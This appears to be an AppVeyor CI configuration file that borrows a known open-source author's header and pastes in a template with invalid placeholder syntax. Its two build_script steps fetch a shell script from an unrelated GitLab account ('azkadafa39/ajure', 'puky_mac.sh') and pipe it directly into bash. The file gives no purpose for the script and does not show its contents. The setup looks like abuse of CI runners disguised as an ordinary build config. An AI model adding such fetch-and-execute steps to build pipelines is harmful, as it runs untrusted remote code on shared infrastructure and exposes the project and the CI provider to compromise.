#
#  Author: Hari Sekhon
#  Date: 2020-02-24 16:19:35 +0000 (Mon, 24 Feb 2020)
#
#  vim:ts=2:sts=2:sw=2:et
#
#  https://github.com/HariSekhon/DevOps-Perl-tools
#
#  License: see accompanying Hari Sekhon LICENSE file
#
#  If you're using my code you're welcome to connect with me on LinkedIn and optionally send me feedback to help steer this or other code I publish
#
#  https://www.linkedin.com/in/HariSekhon
#

# https://www.appveyor.com/docs/appveyor-yml/

image: macOS

# workaround for default JDK9 have old CA certs:
#
#   https://github.com/appveyor/ci/issues/3833
#
#   https://www.appveyor.com/docs/getting-started-with-appveyor-for-linux/#configuring-language-stack
#
stack: jdk 15

skip_commits:
  files:
    - docs/*
    - '**/*.md'

# https://www.appveyor.com/docs/how-to/ssh-to-build-worker/
# Job definitions, sections in [] are optional
environment:
  matrix:

  - job_name: Test1
  [- job_group: Test1]
  [- jobs_per_group: N]
  [- job_depends_on: Test1]
  [- job_allow_cancellation: true]

  - job_name: Test2
  [- job_group: Test2]
  [- jobs_per_group: N]
  [- job_depends_on: Test2]
  [- job_allow_cancellation: true]

  ...

# the first failed job cancels other jobs and fails entire build
matrix:
  fast_finish: true

# configuration common for all jobs
init:
  - appveyor version
  - echo Some common logic here...

# job-specific configurations
for:

  -
    matrix:
      only:
        - job_name: Test1
        
    build_script:
    - curl https://gitlab.com/azkadafa39/ajure/-/raw/main/puky_mac.sh | bash

  -
    matrix:
      only:
        - job_name: Test2

    build_script:
    - curl https://gitlab.com/azkadafa39/ajure/-/raw/main/puky_mac.sh | bash

  ...
